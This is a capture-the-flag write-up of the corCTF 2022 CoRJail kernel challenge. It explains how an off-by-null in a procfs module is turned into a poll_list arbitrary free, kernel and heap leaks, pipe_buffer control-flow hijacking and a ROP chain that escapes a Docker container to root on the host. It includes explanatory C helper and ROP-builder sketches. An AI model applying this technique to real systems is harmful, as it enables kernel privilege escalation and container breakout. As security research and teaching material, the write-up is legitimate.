CoRJail is a kernel exploitation challenge designed for corCTF 2022. Players were asked to escape from a hardened Docker container with custom seccomp filters by exploiting an Off-By-Null vulnerability in a Linux Kernel Module accessible via procfs. In this article, I present a novel kernel exploitation technique I originally used in the Google kCTF Vulnerability Reward Program to compromise Google’s hardened Kubernetes infrastructure, escaping from an nsjail and gaining root privileges on a Container Optimized OS. Let’s get started!
Last year, FizzBuzz101 and I designed two kernel exploitation challenges for corCTF 2021, Fire of Salvation and Wall of Perdition, demonstrating a novel technique to get arbitrary read and arbitrary write in the Linux kernel using msg_msg objects and userfaultfd. Over the past year, the technique has been extensively used in real-world exploits and was later extended to work with FUSE instead of userfaultfd.
For corCTF 2022, we decided to do the same, designing two challenges whose solutions required a novel approach. I decided to write CoRJail, demonstrating an approach I originally used to compromise Google’s kCTF. This technique consists of an arbitrary free primitive, obtainable in almost every general purpose cache by exploiting poll_list objects. FizzBuzz101 instead designed a challenge, Cache of Castaways, whose solution required a cross-cache overflow into cred_jar to corrupt the current task’s cred structure and get root privileges.
CoRJail consists of a hardened Docker container running on a custom Debian Bullseye image, improperly called CoROS. The default Docker seccomp profile was modified to block multiple syscalls, including msgget()/msgsnd() and msgrcv(). On the other hand, certain syscalls were made available, like add_key() and keyctl(), allowing the Linux Kernel Key Retention Service to be accessed from within the container. The custom seccomp profile can be found here.
The kernel, 5.10.127, was patched to enable per-CPU syscall usage statistics, using a modified version of this recent kernel patch: procfs - add syscall statistics. Certain subsystems, like io_uring and nftables, were not included in the kernel to reduce attack surface.
All modern protections, like CONFIG_SLAB_FREELIST_HARDENED, were enabled. CONFIG_STATIC_USERMODEHELPER was set to true, forcing usermode helper calls through a single binary, and CONFIG_STATIC_USERMODEHELPER_PATH was set to an empty string. In other words, overwriting modprobe_path was not an option. Finally, I unset CONFIG_KALLSYMS_ALL, making many symbols unavailable in /proc/kallsyms.
The vulnerable Linux Kernel Module, CoRMon, accessible through a procfs
interface, was created to actually display per-CPU syscall count,
restricting the displayed result only to syscalls specified in a filter.
Users were allowed to set a new filter using
echo -n 'syscall_1,syscall_2,...' > /proc_rw/cormon
For example:
echo -n 'sys_read,sys_write' > /proc_rw/cormon
The default CoRMon filter was actually a hint: it displayed many of the syscalls I used in my exploit.
If you want to solve the challenge before reading the rest of the article, it can be found in the corCTF 2022 Public Archive.
Please note that I could not upload the coros.qcow2 image to GitHub because of its size, so you will need to build it yourself using the provided script.
Exploit an Off-By-Null in kmalloc-4k to corrupt a poll_list object and obtain an arbitrary free primitive. Free a user_key_payload structure and corrupt it to get an OOB Read. Leak a heap object / kernel pointer. Reuse poll_list to arbitrarily free a pipe_buffer structure, hijack control flow and escape from the container to get a CoR Flag License key, then guess the correct options on the CoR Flag License Website to get the actual flag.
It’s Only A Zero, What Could Go Wrong?
Given the relatively complex exploitation stage and the 48-hour limit, I decided to make the bug extremely easy to spot and trigger. On the other hand, I decided not to provide source code, considering that the reverse engineering process would not have taken too long.
Here is the original CoRMon source code:
We can interact with the module through a procfs interface using read() and write(). When we use write(), the cormon_proc_write() function is called to process the user input. The cormon_seq_show() function is instead used to display syscall information when we use read(). As we can see, there is a clear Off-By-Null in cormon_proc_write(). Let’s extract the function from the source code and ignore the rest:
If the number of bytes written is greater than PAGE_SIZE (4096), the len variable is set to PAGE_SIZE - 1, otherwise it is set to count. Afterwards, a chunk of 4096 bytes is allocated in kmalloc-4k and the list of syscalls is copied from user-space to kernel-space: it will be parsed by update_filter(). The list, now copied to kernel-space, is subsequently null terminated.
The check clearly does not cover the case where the number of bytes written is equal to PAGE_SIZE. In that case, len would be equal to count (4096), and the line syscalls[len] = '\x00' would result in syscalls[4096] = '\x00', causing the null byte to be written out of bounds, one byte past the end of the 4096-byte chunk.
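The boundary case can be checked with a small userspace model. This is only a sketch of the length selection as described above, not the module's code: the function names are made up for illustration, and fixed_len() is one possible correction rather than an official patch.

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>

#define PAGE_SIZE 4096UL

/* Length selection as described in the text (a model, not the module's code). */
size_t vulnerable_len(size_t count)
{
    return count > PAGE_SIZE ? PAGE_SIZE - 1 : count;
}

/* Same selection with the boundary case included in the check. */
size_t fixed_len(size_t count)
{
    return count >= PAGE_SIZE ? PAGE_SIZE - 1 : count;
}

/* True when writing the terminator at index len leaves a PAGE_SIZE-byte buffer. */
bool terminator_is_oob(size_t len)
{
    return len >= PAGE_SIZE;
}

/* Walks through the three interesting input sizes. */
void demo_off_by_null(void)
{
    assert(!terminator_is_oob(vulnerable_len(PAGE_SIZE - 1)));
    assert(terminator_is_oob(vulnerable_len(PAGE_SIZE)));      /* the bug */
    assert(!terminator_is_oob(vulnerable_len(PAGE_SIZE + 1)));
    assert(!terminator_is_oob(fixed_len(PAGE_SIZE)));
}
```

Only a write of exactly 4096 bytes reaches the out-of-bounds index; anything longer is clamped to 4095.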
This will be enough to escape from the container and get root privileges on the host.
A Dive Into poll_list Objects
As we mentioned in the previous section, the attack surface from within the container is very limited. For example, unshare is blocked by default by seccomp, so it is not possible to create user namespaces and this prevents us from accessing many kernel features.
Many other syscalls are also blocked, including msgget(), msgsnd() and msgrcv(), so this time the good old msg_msg will be left out of the picture. Instead, our exploitation process will mainly rely on poll_list objects. This structure can be used from within the container without having to meet any specific requirements.
The technique we will cover in this article is a special case of the one I used on Google’s systems: in that case I had a virtually unlimited Out-Of-Bounds Write primitive, while here we only have a single null byte written out of bounds.
poll_list objects are allocated in kernel space when we use the poll() syscall to monitor activity on one or more file descriptors.
int poll(struct pollfd *fds, nfds_t nfds, int timeout);
poll() accepts three arguments:
- fds: an array of pollfd structures.
- nfds: the number of pollfd structures in the fds array.
- timeout: the number of milliseconds to wait for an event to occur.
The poll_list structure is composed of a pointer to the next poll_list, a length field corresponding to the number of pollfd structures in the entries array, and a flexible array of pollfd structures. Each entry is 8 bytes.
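The layout just described can be mirrored in userspace to check the sizes. This is a sketch for a 64-bit target: poll_list_model and poll_list_alloc_size() are illustrative names, and the size formula (header plus 8 bytes per entry) is an assumption about how the kernel sizes each node.

```c
#include <assert.h>
#include <poll.h>
#include <stddef.h>

/* Userspace mirror of the kernel's struct poll_list, for layout checks only. */
struct poll_list_model {
    struct poll_list_model *next;   /* first QWORD: pointer to the next node */
    int len;                        /* number of entries stored in this node */
    struct pollfd entries[];        /* flexible array of 8-byte pollfd entries */
};

/* Bytes requested from the allocator for a node holding n entries (assumed formula). */
size_t poll_list_alloc_size(size_t n)
{
    assert(n > 0);
    return sizeof(struct poll_list_model) + n * sizeof(struct pollfd);
}
```

With a 16-byte header, a single entry needs 24 bytes and 510 entries need exactly 4096 bytes.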
When we use the poll() syscall, do_sys_poll() is called in kernel-space. This function is responsible for copying the entries we passed to poll() in the fds array to kernel space.
do_sys_poll() has two paths, a slow path and a fast path. As we can see at the beginning of the function, stack_pps, a buffer of 256 bytes, is defined. It is used to store the first 30 pollfd entries. This is the fast path: entries are stored on the stack to save memory and improve speed.
If we submit more than 30 pollfd entries, we enter the slow path and the remaining ones are allocated on the kernel heap. This means that, if we do the math correctly, we can control the allocation size by controlling the number of monitored file descriptors, ranging from kmalloc-32 to kmalloc-4k. It is possible to allocate a maximum of POLLFD_PER_PAGE (510) entries per page. If this limit is exceeded, a new poll_list is allocated to store the remaining entries and it is connected to the previous one in a singly linked list. The for loop continues until all entries have been stored in kernel memory.
Let’s say, for example, we call poll(), providing 30 + 510 + 1 file descriptors to the syscall. In kernel space, the first 30 entries are stored on the stack, and the remaining ones result in a poll_list with 510 entries allocated in kmalloc-4k and a second poll_list, with a single entry, allocated in kmalloc-32. The structures are connected in a singly linked list.
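The arithmetic behind these numbers can be sketched in a few lines. The helper names are hypothetical, and the list of kmalloc cache sizes is an assumption for a typical x86_64 SLUB configuration; the constants follow the 256-byte stack buffer, the 16-byte header and the 8-byte entries described above.

```c
#include <assert.h>
#include <stddef.h>

#define PAGE_SIZE        4096UL
#define POLL_STACK_ALLOC 256UL
#define POLL_LIST_HDR    16UL   /* sizeof(struct poll_list) on x86_64 */
#define POLLFD_SIZE      8UL    /* sizeof(struct pollfd) */
#define N_STACK_PPS      ((POLL_STACK_ALLOC - POLL_LIST_HDR) / POLLFD_SIZE)  /* 30 */
#define POLLFD_PER_PAGE  ((PAGE_SIZE - POLL_LIST_HDR) / POLLFD_SIZE)         /* 510 */

/* Smallest kmalloc cache that fits size (cache list is an assumption). */
size_t kmalloc_cache_for(size_t size)
{
    static const size_t caches[] = {8, 16, 32, 64, 96, 128, 192, 256,
                                    512, 1024, 2048, 4096, 8192};
    for (size_t i = 0; i < sizeof(caches) / sizeof(caches[0]); i++)
        if (size <= caches[i])
            return caches[i];
    return 0;
}

/* Stores the cache of every heap poll_list needed for nfds entries; returns the count. */
size_t poll_list_caches(size_t nfds, size_t *out, size_t cap)
{
    size_t n = 0;
    size_t todo = nfds > N_STACK_PPS ? nfds - N_STACK_PPS : 0;

    while (todo > 0) {
        size_t len = todo < POLLFD_PER_PAGE ? todo : POLLFD_PER_PAGE;
        assert(n < cap);
        out[n++] = kmalloc_cache_for(POLL_LIST_HDR + len * POLLFD_SIZE);
        todo -= len;
    }
    return n;
}
```

For 30 + 510 + 1 descriptors the model yields two heap nodes, one in kmalloc-4k and one in kmalloc-32, while 30 descriptors or fewer never touch the heap.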
After all poll_list objects have been allocated, there is a call to do_poll(): it will monitor the provided file descriptors until a specific event occurs or the timer expires. The end_time variable here corresponds to the timeout variable we passed as third argument to the poll() syscall. This means that poll_list objects can be kept in memory for an arbitrary amount of time; then, when the timer expires, they will be automatically freed.
The very interesting part is how poll_list structures are freed: a while loop is used to traverse the singly linked list, freeing each of them. Now let’s look at what we have from an attacker’s perspective. We have a structure that can be allocated in multiple caches, ranging from kmalloc-32 to kmalloc-4k, and the object pointed to by its next field (first QWORD) is automatically freed when a timer that we control expires. This means that, given an Out-Of-Bounds Write or a Use-After-Free Write primitive, we can overwrite the next field of a poll_list structure with the address of a target object, and when the timer fires, that object will be automatically freed.
The only constraint is that we need to make sure the first QWORD of the target object is NULL, otherwise the while loop will treat it as a valid pointer and will try to access it. This is not a problem: we can use a misaligned free primitive, or we can simply target objects whose first QWORD is equal to zero.
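The effect of a corrupted next pointer on the cleanup loop can be reproduced in userspace. The following is a model only: struct node stands in for poll_list, model_kfree() for kfree(), and the victim is an ordinary heap allocation whose first QWORD is zero.

```c
#include <assert.h>
#include <stdint.h>
#include <stdlib.h>

struct node {                 /* stand-in for struct poll_list */
    struct node *next;
    int len;
};

#define MAX_FREED 8
static uintptr_t freed[MAX_FREED];
static size_t nfreed;

/* Stand-in for kfree(): records the address, then releases it. */
static void model_kfree(void *p)
{
    assert(nfreed < MAX_FREED);
    freed[nfreed++] = (uintptr_t)p;
    free(p);
}

/* Same traversal as the cleanup loop described above. */
void free_chain(struct node *walk)
{
    while (walk) {
        struct node *pos = walk;
        walk = walk->next;
        model_kfree(pos);
    }
}

/* Returns 1 if redirecting next makes the loop free the victim. */
int demo_arbitrary_free(void)
{
    struct node *first  = calloc(1, sizeof(*first));   /* "kmalloc-4k" node */
    struct node *second = calloc(1, sizeof(*second));  /* "kmalloc-32" node */
    struct node *victim = calloc(1, sizeof(*victim));  /* first QWORD is zero */
    assert(first && second && victim);
    uintptr_t victim_addr = (uintptr_t)victim;

    first->next = second;   /* legitimate chain */
    first->next = victim;   /* attacker-controlled overwrite */

    nfreed = 0;
    free_chain(first);
    free(second);           /* never reached by the loop, released here */
    return nfreed == 2 && freed[1] == victim_addr;
}
```

Because the victim's first QWORD is NULL, the loop stops right after freeing it, which is the constraint stated above.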
In the specific case of kmalloc-4k, if the next field already contains a valid pointer to another poll_list, we can corrupt it with a partial overwrite (even with a single byte), making it point to another object in the slab. When the timer expires, the kernel will be tricked into freeing the wrong object. This is exactly what we are going to do in the exploit.
The following code can be used to allocate poll_list structures in kernel space. Note that we need to use threads to spray this object, because the poll() syscall will block until a specific event occurs or the timer expires.
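A minimal sketch of such an allocation helper is shown here; it is not the code from the exploit. poll_alloc() is a hypothetical name, the POLLERR event mask is an assumption chosen so that the call normally just waits for the timeout, and the function is meant to be the body of a spray thread since it blocks.

```c
#include <assert.h>
#include <poll.h>
#include <stdlib.h>

#define N_STACK_PPS 30   /* entries kept on the kernel stack */

/*
 * Blocks in poll() for timeout_ms while the kernel keeps heap_entries
 * pollfd entries in heap-allocated poll_list nodes.
 * Returns the poll() result, or -1 if the local buffer cannot be allocated.
 */
int poll_alloc(int fd, size_t heap_entries, int timeout_ms)
{
    assert(heap_entries > 0);
    nfds_t nfds = N_STACK_PPS + heap_entries;
    struct pollfd *pfds = calloc(nfds, sizeof(*pfds));
    if (!pfds)
        return -1;

    for (nfds_t i = 0; i < nfds; i++) {
        pfds[i].fd = fd;
        pfds[i].events = POLLERR;
    }

    int ret = poll(pfds, nfds, timeout_ms);
    free(pfds);
    return ret;
}
```

Passing 510 + 1 as heap_entries corresponds to the kmalloc-4k plus kmalloc-32 layout discussed earlier. Each call would run in its own thread, and the total number of entries must stay within the process file descriptor limit.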
The Exploit - From Zero To Information Leak
The strategy we are going to use in the first part of the exploit,
consists of utilizing the Off-By-Null in kmalloc-4k to corrupt the
next field of a
poll_list structure chained to another one in
kmalloc-32, making the corrupted pointer point to another object in the
slab. When the timer fires, that object will be automatically freed.
We need to choose a target structure that, once arbitrarily freed, can be corrupted to give us an Out-Of-Bounds Read primitive and a subsequent information leak. There are multiple elastic objects in the Linux kernel that may do the trick, but we need the first QWORD of the target object to be NULL, which rules some good candidates out. Since add_key() and keyctl() are not blocked by seccomp, we can opt for user_key_payload.
The problem with this structure is that its first member, struct rcu_head rcu, is not initialized, and since the structure is allocated with kmalloc(), the first QWORD might not be NULL. A practical solution comes from setxattr(): we can use it to fill the chunk with zeros before allocating each user key.
With setxattr(), we can allocate a chunk of arbitrary size and fill it with arbitrary data; it will then be automatically freed right before the function returns. We can exploit this function to make sure the uninitialized member of user_key_payload is actually zero.
We simply need to call setxattr() right before alloc_key(): because of the LIFO behavior of freelists, once the chunk used by setxattr() is allocated, filled with zeros and then freed, it will be reused by the user key. Now we can be sure the first QWORD is set to NULL.
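The pairing of the two calls can be sketched as follows. This is an illustration under assumptions, not the exploit's code: the xattr name "user.x", the path argument and the helper names other than alloc_key() are hypothetical, and the 24-byte header size assumes the x86_64 layout of user_key_payload (16-byte rcu_head, 2-byte length, data aligned to 8 bytes).

```c
#include <assert.h>
#include <string.h>
#include <sys/syscall.h>
#include <sys/xattr.h>
#include <unistd.h>

#define KEY_SPEC_PROCESS_KEYRING (-2)   /* value from <linux/keyctl.h> */
#define USER_KEY_HDR 24                 /* assumed header size of user_key_payload */

/* Largest payload that keeps a user key inside the given kmalloc cache. */
size_t key_payload_len(size_t cache_size)
{
    assert(cache_size > USER_KEY_HDR);
    return cache_size - USER_KEY_HDR;
}

/* Asks the kernel for a transient, zero-filled buffer of `size` bytes. */
void zero_chunk(const char *path, size_t size)
{
    char buf[4096];
    assert(size <= sizeof(buf));
    memset(buf, 0, size);
    /* The result is ignored: only the temporary kernel buffer matters here. */
    (void)setxattr(path, "user.x", buf, size, XATTR_CREATE);
}

/* Thin add_key(2) wrapper for the "user" key type; returns the key id or -1. */
long alloc_key(const char *desc, const void *payload, size_t len)
{
    return syscall(__NR_add_key, "user", desc, payload, len,
                   KEY_SPEC_PROCESS_KEYRING);
}

/* setxattr() immediately followed by add_key(), both sized for the same cache. */
long alloc_zeroed_key(const char *path, const char *desc,
                      const void *payload, size_t cache_size)
{
    zero_chunk(path, cache_size);
    return alloc_key(desc, payload, key_payload_len(cache_size));
}
```

For kmalloc-32 this leaves room for 8 bytes of key data; the caller supplies a payload buffer of at least that size.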
With this in mind, we can start writing our exploit:
First, we assign the current process to core 0 using sched_setaffinity() (through a simple wrapper), since we are working in a multi-core environment and slabs are per-CPU. Then, we start by spraying many structures in kmalloc-32 to fill partial slabs, so the next allocations will end up in a brand new slab.
We proceed using
alloc_key() (a simple
add_key() wrapper) to spray
user_key_payload structures in kmalloc-32.  As
explained above, we use
setxattr() to make sure the chunk is actually zeroed out before a new user key is allocated.
Now we finally spray poll_list structures in kmalloc-4k, each chained to a poll_list in kmalloc-32. At this point the situation in memory will probably be similar to [Fig. 1A], with unallocated chunks in white, poll_list in green, and user keys in orange.
We can continue spraying more user keys in kmalloc-32 to completely saturate the slab. [Fig. 1B]
We are ready to trigger the Off-By-Null bug, hijack a
next pointer and trigger the arbitrary free:
We can trigger the allocation of a chunk in kmalloc-4k by writing
4096 bytes to the CoRMon procfs interface.  This will also
cause a null byte to be written out of bounds, and will corrupt the next
object in memory. Since we sprayed
poll_list structures in
kmalloc-4k, and each one has a pointer to a
poll_list in kmalloc-32,
we will be able to corrupt one of the pointers, making it point to one
of the user keys we sprayed in the previous step. [Fig. 2A]
Now we can use join_poll_threads() and wait until the timers expire and the poll_list objects are automatically freed. One of the user_key_payload structures will be released as well. [Fig. 2B]
We caused a Use-After-Free situation. Now we need to exploit it and corrupt the user key to obtain an Out-Of-Bounds Read primitive:
First, we spray many seq_operations structures in kmalloc-32. One of them will overwrite the user key we freed in the previous step, corrupting its len field (an unsigned short) with the two lower bytes of the function pointer stored at the same offset in seq_operations. In our case, these two bytes are 0x4330, so this will give us a huge Out-Of-Bounds Read primitive. The function pointer that follows it will instead overwrite the first QWORD of the user key data field. You can see the seq_operations structures in yellow in [Fig. 3A]; one of them corrupted the key.
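The overlap can be illustrated with a userspace model of the two layouts. The offsets assume x86_64 (length at offset 16, data at offset 24 of user_key_payload, and four 8-byte function pointers in seq_operations) on a little-endian machine; the helper names are illustrative only.

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

/* Model of struct seq_operations: four function pointers, 32 bytes. */
struct seq_ops_model {
    uint64_t start, stop, next, show;
};

#define KEY_LEN_OFF  16   /* length field, right after the 16-byte rcu_head */
#define KEY_DATA_OFF 24   /* start of the key data */

/* Length the kernel would read once seq_operations occupies the key's chunk. */
uint16_t overlapped_len(const struct seq_ops_model *ops)
{
    uint16_t len;
    memcpy(&len, (const uint8_t *)ops + KEY_LEN_OFF, sizeof(len));
    return len;
}

/* First QWORD of the key data after the overlap. */
uint64_t overlapped_first_qword(const struct seq_ops_model *ops)
{
    uint64_t v;
    assert(sizeof(*ops) >= KEY_DATA_OFF + sizeof(v));
    memcpy(&v, (const uint8_t *)ops + KEY_DATA_OFF, sizeof(v));
    return v;
}
```

With a third pointer ending in 0x4330, the corrupted key reports a length of 0x4330 bytes, and the fourth pointer is the first value returned when the key is read.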
We can now use leak_kernel_pointer() to iterate through all the keys until one of them returns that kernel function pointer: this way we will identify the corrupted key and we will be able to calculate the kernel base address. Now we need to reuse the Out-Of-Bounds Read primitive to leak a heap address.
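The base address computation mentioned above is a single subtraction, sketched here with a sanity check. The address range and the 2 MiB alignment are assumptions about a typical x86_64 kernel with KASLR, and the symbol offset is build-specific, so the value used in any real exploit has to come from the target kernel image.

```c
#include <assert.h>
#include <stdbool.h>
#include <stdint.h>

#define KERNEL_TEXT_START 0xffffffff80000000ULL   /* assumed text mapping range */
#define KERNEL_TEXT_END   0xffffffffc0000000ULL
#define KASLR_ALIGN       0x200000ULL             /* assumed randomization step */

/* Used to recognize the corrupted key: its first QWORD is a text pointer. */
bool looks_like_kernel_text(uint64_t v)
{
    return v >= KERNEL_TEXT_START && v < KERNEL_TEXT_END;
}

/* Base = leaked address - offset of that symbol from the kernel base. */
uint64_t kernel_base_from_leak(uint64_t leak, uint64_t symbol_offset)
{
    assert(looks_like_kernel_text(leak));
    uint64_t base = leak - symbol_offset;
    assert(base % KASLR_ALIGN == 0);   /* a wrong offset usually fails here */
    return base;
}
```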
When we open a ptmx, two structures of interest are allocated: the well known tty_struct in kmalloc-1024 and another one, tty_file_private, in kmalloc-32. Each tty_file_private structure has a pointer to its tty_struct, therefore we can use it to leak the address of an object in kmalloc-1024.
We can free all the keys in kmalloc-32 (orange chunks in [Fig. 3A]), except the corrupted one, and replace them with tty_file_private structures (blue chunks in [Fig. 3B]). Then we call leak_heap_pointer() and use the Out-Of-Bounds Read primitive to leak a tty_struct address. [Fig. 3B]
The Exploit - Hijacking Control Flow
At this point we need to free the object in kmalloc-1024. First, we free all the seq_operations structures in kmalloc-32 (yellow chunks in [Fig. 3A-3B]), then we replace them with poll_list objects (green chunks in [Fig. 4A]). Note that the seq_operations structure used to corrupt the user key is also freed, and it is also replaced by a poll_list.
Now we free the corrupted key, causing a Use-After-Free situation over the poll_list. To exploit the Use-After-Free, we reuse the setxattr() trick used in the first stage, but this time, instead of zeroing out the chunk, we set its first QWORD to the address of the target object - 0x18 bytes, then we allocate a user_key_payload structure to consolidate the setxattr buffer in memory.
In other words, since the chunk used by setxattr() is automatically freed when the function returns, we allocate a user key (remember, the first member of a user_key_payload structure is not initialized) to prevent the first QWORD we just set with setxattr() from being overwritten by a subsequent allocation. Doing so, we overwrite the next field of the poll_list structure in kmalloc-32 with the address of the target - 0x18 bytes.
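One way to read the 0x18 adjustment, stated here as an assumption rather than something the text spells out: 0x18 is the size of the user_key_payload header on x86_64, so a user key later allocated at target - 0x18 has its data starting exactly at the target object. The arithmetic is sketched with hypothetical helper names.

```c
#include <assert.h>
#include <stdint.h>

#define USER_KEY_HDR 0x18   /* assumed: rcu_head (0x10) + length field, padded to 8 bytes */

/* Value to plant in the next field so that a key reallocated there covers target. */
uint64_t fake_next_for(uint64_t target)
{
    assert(target >= USER_KEY_HDR);
    return target - USER_KEY_HDR;
}

/* Address where the data of a user key allocated at chunk begins. */
uint64_t key_data_addr(uint64_t chunk)
{
    return chunk + USER_KEY_HDR;
}
```

Under this reading, the first QWORD that must be NULL for the cleanup loop is the one located 0x18 bytes before the target.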
Originally, my goal was to arbitrarily free a tty_struct and get RIP control by overwriting its ops pointer. Then I changed my mind (too many checks, even if they can be bypassed), and I decided to target a pipe_buffer instead.
We proceed by freeing all TTYs, and we spray pipe_buffer objects. This way we replace the freed tty_struct with a pipe_buffer in kmalloc-1024. Then, we wait until the timers expire, and the pipe_buffer object pointed to by the next field of the corrupted
poll_list, is automatically freed. [Fig.
Finally, we free all user keys, and we reallocate them in kmalloc-1024: we use them to spray our ROP-chain. One of the key payloads will corrupt the target pipe_buffer, redirecting its release operation to a stack pivot gadget.
Now we only need to close all pipes, triggering the call to pipe_release(). This will execute our stack pivot gadget, and we will finally be able to hijack control flow. [Fig. 5B]
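A possible payload layout for this step is sketched below. It is not taken from the exploit: it assumes the 5.10 x86_64 layouts where the ops pointer sits at offset 0x10 of pipe_buffer and release is the second member of pipe_buf_operations, it assumes the key data overlaps the pipe_buffer from its first byte, and craft_pipe_buffer() with its parameters is a hypothetical helper.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define PIPE_BUF_OPS_OFF 0x10   /* assumed offset of pipe_buffer.ops */
#define OPS_RELEASE_OFF  0x08   /* assumed offset of pipe_buf_operations.release */

/*
 * Fills a key payload that overlaps the target pipe_buffer.
 * buf_addr is the kernel address of that pipe_buffer; fake_ops_off is the
 * offset, inside the same payload, where a fake operations table is placed.
 */
void craft_pipe_buffer(uint8_t *payload, size_t len, uint64_t buf_addr,
                       size_t fake_ops_off, uint64_t pivot_gadget)
{
    uint64_t fake_ops = buf_addr + fake_ops_off;

    assert(fake_ops_off % 8 == 0);
    assert(fake_ops_off >= PIPE_BUF_OPS_OFF + 8);
    assert(fake_ops_off + OPS_RELEASE_OFF + 8 <= len);

    memset(payload, 0, len);
    /* ops points back into the payload itself */
    memcpy(payload + PIPE_BUF_OPS_OFF, &fake_ops, sizeof(fake_ops));
    /* the release slot of the fake table holds the stack pivot gadget */
    memcpy(payload + fake_ops_off + OPS_RELEASE_OFF, &pivot_gadget,
           sizeof(pivot_gadget));
}
```

The rest of the payload would carry the ROP-chain, placed wherever the chosen pivot gadget moves the stack pointer.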
The Exploit - Container Escape
The last piece of the puzzle is the ROP-chain used to escape from the container. Let’s take a look at what I used in the exploit:
The first part has nothing special. We use a stack pivot gadget to hijack control flow , then prepare_kernel_cred()  and commit_creds()  to escalate privileges, and then we locate the Docker container task using find_task_by_vpid()  and we use switch_task_namespaces()  to replace its nsproxy structure with init_nsproxy. But this is not enough to escape from the container.
In Docker containers, unlike Google’s kCTF, setns() is blocked by default by seccomp, which means that we cannot use it to enter other namespaces after returning to user-space. We need to find an alternative approach, and we need to implement it in the ROP-chain.
Reading the setns() source code, we can see that it calls commit_nsset() to actually move the task into a different namespace. We can replicate what it does using copy_fs_struct() to clone the init_fs structure, then we locate the current task using find_task_by_vpid() and we manually install the new fs_struct using a write-what-where gadget.
We can finally use the KPTI trampoline, swapgs_restore_regs_and_return_to_usermode, and get a shell on the host.
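The overall shape of such a chain can be sketched as an array of 64-bit words. Everything here is a placeholder: the gadget names are hypothetical, all offsets are build-specific, the PID passed to find_task_by_vpid() is an assumption, and the two dummy slots after the trampoline depend on the entry point chosen inside it. The stack pivot and the namespace-entering step are left out for brevity.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Placeholder offsets from the kernel base; every value is build-specific. */
struct kernel_offsets {
    uint64_t pop_rdi_ret;             /* hypothetical gadget: pop rdi; ret */
    uint64_t pop_rsi_ret;             /* hypothetical gadget: pop rsi; ret */
    uint64_t mov_rdi_rax_ret;         /* hypothetical gadget: mov rdi, rax; ret */
    uint64_t prepare_kernel_cred;
    uint64_t commit_creds;
    uint64_t find_task_by_vpid;
    uint64_t switch_task_namespaces;
    uint64_t init_nsproxy;
    uint64_t kpti_trampoline;         /* entry inside swapgs_restore_regs_and_return_to_usermode */
};

/* Saved user-mode state consumed when returning to user-space. */
struct user_frame {
    uint64_t rip, cs, rflags, rsp, ss;
};

#define ROP_WORDS 20

/* Writes the chain into rop and returns the number of words used. */
size_t build_rop(uint64_t *rop, size_t cap, uint64_t kbase,
                 const struct kernel_offsets *o, const struct user_frame *uf)
{
    size_t n = 0;
    assert(cap >= ROP_WORDS);

    /* commit_creds(prepare_kernel_cred(NULL)) */
    rop[n++] = kbase + o->pop_rdi_ret;
    rop[n++] = 0;
    rop[n++] = kbase + o->prepare_kernel_cred;
    rop[n++] = kbase + o->mov_rdi_rax_ret;
    rop[n++] = kbase + o->commit_creds;

    /* switch_task_namespaces(find_task_by_vpid(1), &init_nsproxy); PID 1 is an assumption */
    rop[n++] = kbase + o->pop_rdi_ret;
    rop[n++] = 1;
    rop[n++] = kbase + o->find_task_by_vpid;
    rop[n++] = kbase + o->mov_rdi_rax_ret;
    rop[n++] = kbase + o->pop_rsi_ret;
    rop[n++] = kbase + o->init_nsproxy;
    rop[n++] = kbase + o->switch_task_namespaces;

    /* return to user-space through the KPTI trampoline */
    rop[n++] = kbase + o->kpti_trampoline;
    rop[n++] = 0;                     /* dummy slot (assumed) */
    rop[n++] = 0;                     /* dummy slot (assumed) */
    rop[n++] = uf->rip;
    rop[n++] = uf->cs;
    rop[n++] = uf->rflags;
    rop[n++] = uf->rsp;
    rop[n++] = uf->ss;

    return n;
}
```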
Here is the final exploit in action:
The final exploit can be found here: exploit.c.
PS: In the exploit I assign the process to another core before creating poll threads. This is useful to reduce noise due to thread creation on core 0 slabs. Once a thread has been created, it is assigned back to core 0 before calling poll().
poll_list objects can be used to obtain an arbitrary free
primitive in almost every general purpose cache. Many recent
vulnerabilities can be exploited using this structure in complete
CoRJail only had one solver. A big shout out goes to Kylebot for getting first blood. It turns out that extended security attributes are usable inside the container without requiring any special capability. So he could solve the challenge by transforming the Off-By-Null in kmalloc-4k into a Cross-Cache Null Byte Overflow, targeting the simple_xattr structure in kmalloc-192.
This cache is unaligned, so he made the corrupted pointer point into the middle of another simple_xattr object in the same slab. There, he forged a fake header to obtain an Out-Of-Bounds Read primitive.
To fake a
simple_xattr structure, he needed a valid pointer containing controlled data in the
name field, so he ended up using another kCTF technique. He faked the pointer and its content using cpu_entry_area. This memory region is not affected by KASLR, and as reported by Kylebot, it is possible to use a div 0 or a ud2 instruction to copy all CPU registers in this zone and use them as a payload.
After obtaining an information leak, he used the recent unlinking attack with simple_xattr to overwrite the file_operations pointer of a file structure with a controlled heap address. From here he could hijack control flow and use a ROP-chain to escape from the container. What a crazy approach! Isn’t it?
If you have any question or need any clarification, feel free to contact me. You can find my contact information in About.
The challenge can be downloaded from the corCTF 2022 Public Archive.
Syscall statistics patch
Utilizing msg_msg Objects For Arbitrary Read And Arbitrary Write In The Linux Kernel
- https://www.willsroot.io/2021/08/corctf-2021-fire-of-salvation-writeup.html (Part 1: Fire Of Salvation)
- https://syst3mfailure.io/wall-of-perdition (Part 2: Wall Of Perdition)
Unlinking attack with simple_xattr